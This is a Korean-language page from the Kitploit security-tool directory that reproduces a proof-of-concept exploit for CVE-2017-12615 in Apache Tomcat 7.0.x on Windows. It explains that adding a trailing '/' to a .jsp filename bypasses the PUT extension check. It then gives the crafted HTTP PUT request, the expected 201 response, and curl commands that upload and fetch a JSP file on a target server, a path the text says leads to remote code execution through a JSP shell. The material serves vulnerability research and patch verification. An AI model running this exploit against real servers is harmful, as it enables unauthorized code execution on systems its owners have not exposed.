Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2017-12615 — Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP 취약점에 대한 POC 익스플로잇. | Kitploit
도구/GitHubGitHub/breaktoprotect/cve-2017-12615
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP 취약점에 대한 POC 익스플로잇.

저장소 보기
112213년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Chia Junyuan을 기리며 (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

Windows에서 실행되는 Apache Tomcat 7.0.0~7.0.79용 POC 익스플로잇; CVE-2017-12615 PUT JSP 취약점.

설명:

기본적으로 Apache Tomcat 서버에서는 PUT 메서드를 통해 JSP 파일을 업로드할 수 없습니다. 이는 공격자가 JSP 셸을 업로드하여 서버에서 원격 코드 실행을 획득하는 것을 방지하기 위한 보안 조치로 보입니다. 그러나 불충분한 검사로 인해 공격자는 특수하게 조작된 HTTP 요청을 사용하여 Tomcat 서버에 PUT 메서드를 요청함으로써 PUT이 활성화된 7.0.{0 to 79} Tomcat 서버에서 원격 코드 실행을 획득할 수 있습니다. 하지만 진심으로, 특별하다고? 제발요.

익스플로잇 방법:

파일 이름의 확장자 뒤에 '/' 문자를 추가하면 파일 확장자 검사를 우회할 수 있습니다. 그게 전부입니다. 그러니까, 사실 그렇게 특별하지 않습니다.

요청 메서드에서의 익스플로잇:

요청

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

성공 시 예상 응답

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

'curl'을 사용한 익스플로잇:

  1. .jsp 파일을 생성합니다 (예: test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. 대상 서버에서 curl 명령을 실행합니다:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. 대상 주소로 이동하여 파일이 업로드되었는지 확인하거나 다음을 실행합니다:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
도구 다운로드